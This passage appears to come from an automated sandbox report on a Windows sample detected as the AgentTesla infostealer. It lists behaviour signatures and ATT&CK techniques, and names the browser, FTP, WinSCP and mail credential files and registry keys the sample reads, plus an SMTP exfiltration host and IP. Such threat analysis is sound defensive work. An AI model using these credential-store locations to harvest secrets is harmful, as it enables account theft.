                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.503288877.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.256848619.0000000004239000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.508389170.000000000314E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.258031189.00000000044E9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.18332.exe PID: 6660, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.18332.exe PID: 6844, type: MEMORY
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.4503250.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.18332.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.4503250.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.4403ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.43a6580.2.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.18332.exe PID: 6844, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000005.00000002.503288877.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.256848619.0000000004239000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.508389170.000000000314E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.258031189.00000000044E9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.507292390.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.18332.exe PID: 6660, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.18332.exe PID: 6844, type: MEMORY
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.4503250.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.18332.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.4503250.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.4403ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.18332.exe.43a6580.2.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Obfuscated Files or Information21Input Capture21System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing13Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery321Distributed Component Object ModelInput Capture21Scheduled TransferApplication Layer Protocol111SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion14LSA SecretsVirtualization/Sandbox Evasion14SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 356591 Sample: SecuriteInfo.com.Win32.1833... Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 33 Found malware configuration 2->33 35 Multi AV Scanner detection for dropped file 2->35 37 Sigma detected: Scheduled temp file as task from temp location 2->37 39 10 other signatures 2->39 7 SecuriteInfo.com.Win32.18332.exe 7 2->7         started        process3 file4 23 C:\Users\user\AppData\Roaming\mwflisJj.exe, PE32 7->23 dropped 25 C:\Users\...\mwflisJj.exe:Zone.Identifier, ASCII 7->25 dropped 27 C:\Users\user\AppData\Local\...\tmp1CC4.tmp, XML 7->27 dropped 29 C:\...\SecuriteInfo.com.Win32.18332.exe.log, ASCII 7->29 dropped 41 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->41 43 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->43 45 Contains functionality to register a low level keyboard hook 7->45 47 Injects a PE file into a foreign processes 7->47 11 SecuriteInfo.com.Win32.18332.exe 2 7->11         started        15 schtasks.exe 1 7->15         started        17 SecuriteInfo.com.Win32.18332.exe 7->17         started        19 SecuriteInfo.com.Win32.18332.exe 7->19         started        signatures5 process6 dnsIp7 31 mail.privateemail.com 198.54.122.60, 49746, 587 NAMECHEAP-NETUS United States 11->31 49 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->49 51 Tries to steal Mail credentials (via file access) 11->51 53 Tries to harvest and steal ftp login credentials 11->53 55 2 other signatures 11->55 21 conhost.exe 15->21         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Win32.18332.exe27%VirustotalBrowse
                      SecuriteInfo.com.Win32.18332.exe35%ReversingLabsWin32.Trojan.AgentTesla
                      SecuriteInfo.com.Win32.18332.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\mwflisJj.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\mwflisJj.exe35%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.SecuriteInfo.com.Win32.18332.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.fontbureau.comaYyz0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/a-d0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/a-d0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/a-d0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/a-d0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/Kyh0%Avira URL Cloudsafe
                      http://ozGnLl.com0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/Y0bdPy0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y0tr0%Avira URL Cloudsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://www.carterandcone.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/ers0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.carterandcone.comvK0%Avira URL Cloudsafe
                      http://www.fontbureau.comgrita0%URL Reputationsafe
                      http://www.fontbureau.comgrita0%URL Reputationsafe
                      http://www.fontbureau.comgrita0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Byq0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/py?0%Avira URL Cloudsafe
                      http://onNZeSBttjiYV.com0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
